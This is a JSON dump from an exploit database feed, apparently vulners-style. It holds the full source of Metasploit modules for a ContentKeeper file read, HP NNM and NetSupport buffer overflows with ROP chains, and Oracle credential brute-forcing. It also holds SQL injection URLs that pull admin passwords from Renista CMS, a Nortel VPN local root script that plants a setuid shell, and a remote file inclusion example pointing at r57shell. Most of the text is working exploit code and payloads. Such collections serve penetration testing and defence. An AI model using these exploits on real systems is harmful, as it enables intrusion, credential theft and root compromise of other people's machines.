https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'ContentKeeper Web Appliance mimencode File Access',\n 'Description' => %q{\n This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.\n },\n 'References' =>\n [\n [ 'OSVDB', '54551' ],\n [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],\n ],\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE)\n\n register_options(\n [\n OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),\n OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),\n ])\n end\n\n def run_host(ip)\n begin\n tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.\n\n print_status(\"Attempting to connect to #{rhost}:#{rport}\")\n res = send_request_raw(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],\n }, 25)\n\n if (res and res.code == 500)\n\n print_good(\"Request appears successful on #{rhost}:#{rport}! Response: #{res.code}\")\n\n file = send_request_raw(\n {\n 'method' => 'GET',\n 'uri' => '/' + tmpfile,\n }, 25)\n\n if (file and file.code == 200)\n print_status(\"Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\\r\\n#{Rex::Text.decode_base64(file.body)}\")\n elsif (file and file.code)\n print_error(\"Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \\r\\n#{res.body}\")\n end\n elsif (res and res.code)\n print_error(\"Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \\r\\n#{res.body}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/contentkeeper_fileaccess.rb"}, {"lastseen": "2019-12-06T23:31:29", "bulletinFamily": "exploit", "description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2011-03-23T21:35:13", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_NNMRPTCONFIG_SCHDPARAMS", "href": "", "type": "metasploit", "title": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow\",\n 'Description' => %q{\n This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'References' =>\n [\n ['CVE', '2011-0267'],\n ['OSVDB', '70473'],\n ['ZDI', '11-009'],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x26\\x2b\",\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"seh\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'NNM 7.53 - Windows Server 2003 Ent', {\n 'Ret' => 0x5A30532D, #POP/POP/RET OvWww.dll\n 'Offset' => 46919, #Offset to SEH chain\n 'Pops' => 13, #Number of POPADs needed to find a bigger space with our payload\n 'Payloadoffset' => 57, #Offset to the payload\n }],\n ],\n 'DisclosureDate' => \"Jan 10 2011\"))\n end\n\n def exploit\n nops = make_nops(1000)*70\n\n sploit = nops[0, target['Offset']]\n sploit << generate_seh_record(target.ret)\n sploit << \"\\x61\"*target['Pops']\n sploit << \"\\xff\\xe1\" #JMP ECX\n sploit << nops[0, target['Payloadoffset']]\n sploit << payload.encoded\n sploit << nops[0, 70000-sploit.length]\n\n data = \"Content&Action=Create&\"\n data << \"Template=Avail/CRAvail&\"\n data << \"Operation=Apply&\"\n data << \"Params=schdParams+nameParams&\"\n data << \"schdParams=#{sploit}%7Cmonthtodate&\"\n data << \"nameParams=text1%3DAAAA%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1\"\n\n connect\n send_request_raw({\n 'uri' => '/OvCgi/nnmRptConfig.exe',\n 'data' => data,\n 'version' => '1.1',\n 'method' => 'POST',\n 'headers' => {\n 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language' => 'en-us,en;q=0.5',\n 'Accept-Encoding' => 'gzip,deflate',\n 'Accept-Chrarset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',\n 'Keep-Alive' => '300',\n 'Connection' => 'Keep-Alive',\n 'Cache-Control' => 'mag-age=0',\n 'Content-Type' => 'application/x-www-form-urlencoded',\n }\n }, 3)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb"}, {"lastseen": "2019-12-09T09:01:21", "bulletinFamily": "exploit", "description": "This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n", "modified": "2019-10-05T18:13:38", "published": "2011-03-14T14:41:46", "id": "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_LOGIN", "href": "", "type": "metasploit", "title": "Oracle RDBMS Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Nmap\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n # Creates an instance of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle RDBMS Login Utility',\n 'Description' => %q{\n This module attempts to authenticate against an Oracle RDBMS\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n },\n 'Author' => [\n 'Patrik Karlsson <patrik[at]cqure.net>', # the nmap NSE script, oracle-brute.nse\n 'todb' # this Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],\n [ 'CVE', '1999-0502'], # Weak password CVE\n [ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']\n ]\n ))\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"oracle_default_userpass.txt\") ]),\n OptString.new('SID', [ true, 'The instance (SID) to authenticate against', 'XE'])\n ])\n\n end\n\n def minimum_nmap_version\n \"5.50\"\n end\n\n def run\n unless nmap_version_at_least? minimum_nmap_version\n print_error \"Installed Nmap version is not at least #{minimum_nmap_version}. Exiting...\"\n return false\n end\n print_status \"Nmap: Setting up credential file...\"\n credfile = create_credfile\n cred_count = 0\n each_user_pass(true) {|user, pass| credfile[0].puts \"%s/%s\" % [user,pass]; cred_count += 1 }\n credfile[0].flush\n nmap_build_args(credfile[1])\n print_status \"Nmap: Starting Oracle bruteforce with #{cred_count} credentials against SID '#{sid}'...\"\n nmap_run\n credfile[0].unlink\n if Rex::Parser.nokogiri_loaded\n nmap_hosts {|type,data| process_nokogiri_callback(type,data)}\n else\n nmap_hosts {|host| process_host(host)}\n end\n end\n\n def sid\n datastore['SID'].to_s\n end\n\n def nmap_build_args(credpath)\n nmap_reset_args\n nmap_append_arg \"-P0\"\n nmap_append_arg \"--script oracle-brute\"\n script_args = [\n \"tns.sid=#{sid}\",\n \"brute.mode=creds\",\n \"brute.credfile=#{credpath}\",\n \"brute.threads=1\"\n ]\n script_args << \"brute.delay=#{set_brute_delay}\"\n nmap_append_arg \"--script-args \\\"#{script_args.join(\",\")}\\\"\"\n nmap_append_arg \"-n\"\n nmap_append_arg \"-v\" if datastore['VERBOSE']\n end\n\n # Sometimes with weak little 10g XE databases, you will exhaust\n # available processes from the pool with lots and lots of\n # auth attempts, so use bruteforce_speed to slow things down\n def set_brute_delay\n case datastore[\"BRUTEFORCE_SPEED\"]\n when 4; 0.25\n when 3; 0.5\n when 2; 1\n when 1; 15\n when 0; 60 * 5\n else; 0\n end\n end\n\n def create_credfile\n outfile = Rex::Quickfile.new(\"msf3-ora-creds-\")\n if Rex::Compat.is_cygwin and self.nmap_bin =~ /cygdrive/i\n outfile_path = Rex::Compat.cygwin_to_win32(outfile.path)\n else\n outfile_path = outfile.path\n end\n @credfile = [outfile,outfile_path]\n end\n\n def process_nokogiri_callback(type,data)\n return unless type == :port_script\n return unless data[\"id\"] == \"oracle-brute\"\n return unless data[:addresses].has_key? \"ipv4\"\n return unless data[:port][\"state\"] == ::Msf::ServiceState::Open\n addr = data[:addresses][\"ipv4\"].to_s\n port = data[:port][\"portid\"].to_i\n output = data[\"output\"]\n parse_script_output(addr,port,output)\n end\n\n def process_host(h)\n h[\"ports\"].each do |p|\n next if(h[\"scripts\"].nil? || h[\"scripts\"].empty?)\n h[\"scripts\"].each do |id,output|\n next unless id == \"oracle-brute\"\n parse_script_output(h[\"addr\"],p[\"portid\"],output)\n end\n end\n end\n\n def extract_creds(str)\n m = str.match(/\\s+([^\\s]+):([^\\s]+) =>/)\n m[1,2]\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: opts[:status],\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def parse_script_output(addr,port,output)\n msg = \"#{addr}:#{port} - Oracle -\"\n @oracle_reported = false\n if output =~ /TNS: The listener could not resolve \\x22/n\n print_error \"#{msg} Invalid SID: #{sid}\"\n elsif output =~ /Accounts[\\s]+No valid accounts found/nm\n print_status \"#{msg} No valid accounts found\"\n else\n output.each_line do |oline|\n if oline =~ /Login correct/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user,pass = extract_creds(oline)\n pass = \"\" if pass == \"<empty>\"\n print_good \"#{msg} Success: #{user}:#{pass} (SID: #{sid})\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n password: pass,\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n )\n elsif oline =~ /Account locked/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user = extract_creds(oline)[0]\n print_good \"#{msg} Locked: #{user} (SID: #{sid}) -- account valid but locked\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::DENIED_ACCESS\n )\n elsif oline =~ /^\\s+ERROR: (.*)/\n print_error \"#{msg} NSE script error: #{$1}\"\n end\n end\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/oracle_login.rb"}, {"lastseen": "2019-12-06T23:27:35", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in NetSupport Manager Agent. It uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.\n", "modified": "2018-09-15T23:54:45", "published": "2011-03-03T01:04:24", "id": "MSF:EXPLOIT/LINUX/MISC/NETSUPPORT_MANAGER_AGENT", "href": "", "type": "metasploit", "title": "NetSupport Manager Agent Remote Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NetSupport Manager Agent Remote Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in NetSupport Manager Agent. It\n uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.\n },\n 'Author' =>\n [\n 'Luca Carettoni (@_ikki)', # original discovery / exploit\n 'Evan', # ported from exploit-db exploit\n 'jduck' # original proftpd_iac ROP, minor cleanups\n ],\n 'Arch' => ARCH_X86,\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-0404' ],\n [ 'OSVDB', '70408' ],\n [ 'BID', '45728' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2011/Jan/90' ],\n [ 'EDB', '15937' ]\n ],\n 'Privileged' => true,\n 'Platform' => 'linux',\n 'Payload' =>\n {\n 'Space' => 0x975,\n 'BadChars' => \"\",\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'linux',\n {\n 'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;\n 'Pad' => 975,\n 'RopStack' =>\n [\n ### mmap isn't used in the binary so we need to resolve it in libc\n 0x00041160, # mmap64 - localtime\n 0xa9ae0e6c, # 0x8092b30 - 0x5e5b1cc4, localtime will become mprotect\n 0xcccccccc,\n 0x08084662, # add DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;\n 0xcccccccc,\n 0xcccccccc,\n 0x080541e4, # localtime@plt (now mmap64)\n 0x080617e3, # add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;\n 0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64 arguments\n 0x0, # unused\n 0x08066332, # pop edx; pop ebx; pop ebp ;;\n \"\\x89\\x1c\\xa8\\xc3\".unpack('V').first, # mov [eax+ebp*4], ebx\n 0xcccccccc,\n 0xcccccccc,\n 0x080555c4, # mov [eax] edx ; pop ebp ;;\n 0xcccccccc,\n #0x0807385a, # push eax ; adc al 0x5d ;;\n\n ### this is the stub used to copy shellcode from the stack to\n ### the newly mapped executable region\n #\\x8D\\xB4\\x24\\x7D\\xFB\\xFF # lea esi,[dword esp-0x483]\n #\\x8D\\x78\\x12 # lea edi,[eax+0x12]\n #\\x6A\\x7F # push byte +0x7f\n #\\x59 # pop ecx\n #\\xF3\\xA5 # rep movsd\n\n ### there are no good jmp eax so overwrite getrlimits GOT entry\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x08092d68 - 0x4, # 08092d68 0002f007 R_386_JUMP_SLOT 00000000 getrlimit\n 0x1, # becomes ebp\n 0x08084f38, # mov [ebx+0x4] eax ; pop ebx ; pop ebp ;;\n 0xfb7c24b4, # become eb\n 0x01,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n #0xffff8d78, # become ebx\n 0x788dffff,\n 0x2,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x597f6a12,\n 0x3,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x9090a5f2,\n 0x4,\n 0x08054ac4, # <getrlimit@plt>\n 0x0805591b, # pop ebx; pop ebp ;;\n 0x8d909090,\n 0x0,\n 0x08054ac4, # <getrlimit@plt>\n 0xcccccccc,\n 0x01010101,\n ]\n }\n ]\n ],\n 'DisclosureDate' => 'Jan 8 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5405),\n ])\n end\n\n def exploit\n connect\n\n #pop_eax_ebx ;\n #0x8084662 # add DWORD PTR [ebx+0x5e5b1cc4],eax ;;\n triggerA = \"\\x15\\x00\\x5a\\x00\" + \"\\x41\" * 1024 + \"\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n triggerB = \"\\x25\\x00\\x51\\x00\\x81\\x41\\x41\\x41\\x41\\x41\\x41\\x00\" +\n \"\\x41\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\"\n\n triggerC = \"\\x37\\x00\\x03\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x58\\xb4\" +\n \"\\x92\\xff\\x00\\x00\\x69\\x6b\\x6b\\x69\\x00\\x57\\x4f\\x52\" +\n \"\\x4b\\x47\\x52\\x4f\\x55\\x50\\x00\\x3c\\x3e\" + #pleasure trail\n #\"\\xcc\" +\n \"\\x90\" +\n payload.encoded +\n \"\\xcc\" * (target['Pad'] - payload.encoded.length) +\n [target.ret].pack('V')\n\n new = ''\n if target['RopStack']\n new << target['RopStack'].map { |e|\n if e == 0xcccccccc\n rand_text(4).unpack('V').first\n else\n e\n end\n }.pack('V*')\n end\n\n triggerC << new\n triggerC << \"\\x00\" * 4\n triggerC << \"\\x00\\x00\\x31\\x32\\x2e\\x36\\x32\\x2e\\x31\\x2e\\x34\\x32\"\n triggerC << \"\\x30\\x00\\x31\\x30\\x00\\x00\"\n\n triggerD = \"\\x06\\x00\\x07\\x00\\x20\\x00\\x00\\x00\\x0e\\x00\\x32\\x00\" +\n \"\\x01\\x10\\x18\\x00\\x00\\x01\\x9f\\x0d\\x00\\x00\\xe0\\x07\" +\n \"\\x06\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x4e\\x00\" +\n \"\\x02\\x00\\xac\\x00\\x04\\x00\\x7f\\x00\\x00\\x00\"\n\n print_status(\"Sending A\")\n sock.put(triggerA)\n select(nil, nil, nil, 1)\n\n print_status(\"Sending B\")\n sock.put(triggerB)\n select(nil, nil, nil, 1)\n\n print_status(\"Sending C\")\n sock.put(triggerC)\n select(nil, nil, nil, 1)\n\n print_status(\"Sending D\")\n sock.put(triggerD)\n select(nil, nil, nil, 1)\n\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/netsupport_manager_agent.rb"}], "zdt": [{"lastseen": "2018-03-12T22:08:52", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2010-05-20T00:00:00", "published": "2010-05-20T00:00:00", "id": "1337DAY-ID-12320", "href": "https://0day.today/exploit/description/12320", "type": "zdt", "title": "Renista CMS SQL Injection Vulnerability", "sourceData": "=======================================\r\nRenista CMS SQL Injection Vulnerability\r\n=======================================\r\n\r\n\r\nTest on CMS Owner site :http://www.rayaco.com \r\n \r\n# db name :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,db_name())--\r\n \r\n# cont user :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--\r\n \r\n# username :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--\r\n \r\n# password :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--\r\n# name :\r\nhttp://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--\r\n========================\r\nI tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .\r\n \r\nSpecial thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...\r\n\r\n\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12320"}, {"lastseen": "2018-03-01T03:33:40", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2007-02-21T00:00:00", "published": "2007-02-21T00:00:00", "id": "1337DAY-ID-7633", "href": "https://0day.today/exploit/description/7633", "type": "zdt", "title": "Nortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit", "sourceData": "=======================================================================\r\nNortel SSL VPN Linux Client <= 6.0.3 Local Privilege Escalation Exploit\r\n=======================================================================\r\n\r\n\r\n\r\n#!/bin/sh\r\n# \r\n# Nortel SSL VPN Linux Client race condition\r\n# \r\n# Jon Hart <[email\u00a0protected]>\r\n#\r\n# The Linux client that is utilized by versions priot to 6.05 of the Nortel\r\n# SSL VPN appliance suffers from a number of problems that, in combination,\r\n# allow an unprivileged local user to obtain root privileges.\r\n# \r\n# This particular bug is as follows:\r\n# 1) SSL VPN is initiated from the startNetdirect() javascript call\r\n# 2) A zip archive is downloaded to the local machine which contains three\r\n# binaries necessary for the client: askpass, client, and surun. This\r\n# archive is written to /tmp, chmod'd 777, and then it is extracted into\r\n# /tmp/NetClient\r\n# 3) All of these files are chmod'd world writable by the following java\r\n# snippet, which is called on all UNIX client OSs:\r\n#\r\n# protected boolean setPermissions(String file)\r\n# {\r\n# String command = \"chmod a+xw \" + file;\r\n# try\r\n# {\r\n# Process p = Runtime.getRuntime().exec(command);\r\n# p.waitFor();\r\n# }\r\n# ...\r\n# }\r\n#\r\n# 4) /tmp/NetClient/surun is executed, which in turn runs\r\n# /tmp/NetClient/askpass. This process aquires the root password, and\r\n# then executes /tmp/NetClient/client via /bin/su and the root password. \r\n#\r\n# There is clearly a bug in step 2 and 3 whereby files are installed world\r\n# writable. The bug I chose to exploit is the race condition in step 4,\r\n# combined with the insecure permissions of steps 2 and 3, which (IMO),\r\n# gives root more easily. The risk here is if you have untrusted accounts\r\n# on the machine from which you access the Nortel VPN, those accounts can\r\n# easily gain local root access.\r\n#\r\n# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear,\r\n# swap it for our \"special version\", and wait for a shell.\r\n#\r\n# Notes: a /tmp with nosuid will help mitigate this particular _exploit_,\r\n# but not the vulnerability. The same vulnerability also exists in the Mac\r\n# client. \r\n#\r\n# For education and testing purposes only. Only run this on systems that\r\n# you maintain/control.\r\n#\r\n\r\ncleanup() {\r\n rm -f $TMP_DIR/.*-$$\\..*\r\n}\r\n\r\n\r\nrun_cmd() {\r\n [email\u00a0protected] \r\n VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX`\r\n\r\n echo \"Waiting for writable client\"\r\n while (true); do\r\n if [ -w $CLIENT ]; then\r\n OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX`\r\n echo \"Saving old client\"\r\n cp $CLIENT $OLD_CLIENT \r\n chmod 755 $OLD_CLIENT\r\n echo \"Writing new \\\"client\\\"\"\r\n echo \"#!/bin/sh\" > $CLIENT \r\n echo \"$CMD\" >> $CLIENT\r\n echo \"rm -f $VPN_CLIENT_RUN\" >> $CLIENT\r\n # ensure the original client gets run so as to \r\n # not alert the user\r\n echo \"exec $OLD_CLIENT \\[email\u00a0protected]\" >> $CLIENT\r\n break\r\n fi\r\n done\r\n\r\n SUCCESS=0\r\n echo \"Waiting for new client to be run\"\r\n while (true); do\r\n if [ ! -f $VPN_CLIENT_RUN ]; then\r\n SUCCESS=1\r\n break\r\n else\r\n sleep 2\r\n fi\r\n done\r\n\r\n if [ $SUCCESS == 1 ]; then\r\n echo \"Success\"\r\n return 0\r\n else \r\n echo \"Exploit failed!\"\r\n cleanup\r\n exit 1\r\n fi\r\n}\r\n\r\nsuid_shell() {\r\n SH_C=\"sh_c-$$.c\"\r\n\r\n # write out setuid shell\r\n cat >> $SH_C << EOF\r\n #include <sys/types.h>\r\n #include <unistd.h>\r\n int main (int argc, char **argv) {\r\n setuid(0);\r\n setgid(0);\r\n execl(\"/bin/bash\", \"bash\", NULL);\r\n }\r\nEOF\r\n\r\n # try like hell to get this shell compiled\r\n SH=`mktemp -t vpnshell-$$.XXXXXXXXXX`\r\n gcc -o $SH $SH_C 2>&1 > /dev/null 2>&1\r\n if [ $? != 0 ]; then\r\n cc -o $SH $SH_C 2>&1 > /dev/null 2>&1\r\n if [ $? != 0 ]; then\r\n echo \"Compilation of shell failed\"\r\n echo \"Trying backup method...\"\r\n run_cmd \"cp /bin/sh $SH && chmod 4755 $SH\"\r\n while (true); do\r\n if [ -u $SH ]; then\r\n $SH \r\n cleanup\r\n exit\r\n else\r\n sleep 1\r\n fi\r\n done\r\n echo \"Failed\"\r\n cleanup\r\n exit 1\r\n fi\r\n fi\r\n rm -f $SH_C \r\n\r\n run_cmd \"chown root:root $SH && chmod 4755 $SH\"\r\n\r\n # wait for our shell to be chmod'd\r\n SUCCESS=0\r\n echo \"Waiting for suid shell\"\r\n for sleep in `seq 1 60`; do\r\n if [ -u $SH ]; then\r\n echo \"Success! setuid shell is $SH\"\r\n SUCCESS=1\r\n break\r\n else\r\n sleep 2\r\n fi\r\n done\r\n\r\n if [ $SUCCESS == 1 ]; then\r\n cleanup\r\n $SH\r\n else \r\n rm -f $SH\r\n echo \"Exploit failed!\"\r\n cleanup\r\n exit 1\r\n fi\r\n}\r\n\r\nCLIENT=\"/tmp/NetClient/client\"\r\n\r\nif [ -f $CLIENT ]; then\r\n echo \"client $CLIENT already exists -- forcing stop\"\r\n $CLIENT --stop\r\n for sleep in `seq 1 60`; do\r\n if [ ! -f $CLIENT ]; then\r\n break\r\n fi\r\n sleep 1\r\n done\r\nfi\r\n\r\n# hack to figure out where temp files get put...\r\nTMP_FILE=`mktemp -t $$`\r\nTMP_DIR=`dirname $TMP_FILE`\r\nrm -f $TMP_FILE\r\n\r\ntrap cleanup 1 2 3 15\r\n\r\n# two modes of operation -- get a root shell, or run a cmd as root.\r\nif [ -z \"$1\" ]; then\r\n suid_shell\r\nelse \r\n run_cmd $1 \r\nfi\r\n\r\ncleanup\r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7633"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Ahhp-Portal Remote File Inclusion\r\n\r\n\r\nS\u042dTE:www.ahhope.org\r\n\r\nDemo:http://xinan.ahtcm.edu.cn\r\nDemo2http://www.hfspaq.gov.cn\r\n\r\n\r\nVul Code:\r\n\r\n <?\r\n\t\tif ($sc=='')\r\n\t\t\tinclude($fp.".php");\r\n\t\telse\r\n\t\t\tinclude($sc."/".$fp.".php");\t\r\n\t\t?>\r\n\r\n\r\n------------------------------------------------\r\n\r\nexample:\r\n\r\nhttp://site/page.php?fp=r57shell?\r\nhttp://site/page.php?sc=r57shell?\r\n\r\n\r\n////////////////////////////////////////////////////\r\n\r\nCredit : CodeXpLoder'tq\r\n\r\nmail : codexploder[at]hotmail[dot]com\r\n\r\nsite : expw0rm.com\r\n\r\n###############################################\r\n\r\nGoogle :\r\n\r\n"page.php?fp"\r\n\r\n// Exploit Worm www.expw0rm.com", "modified": "2007-04-25T00:00:00", "published": "2007-04-25T00:00:00", "id": "SECURITYVULNS:DOC:16838", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16838", "title": "Ahhp(php)-Portal Remote File Inclusion", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-25T00:00:00", "published": "2007-04-25T00:00:00", "id": "SECURITYVULNS:VULN:7633", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7633", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
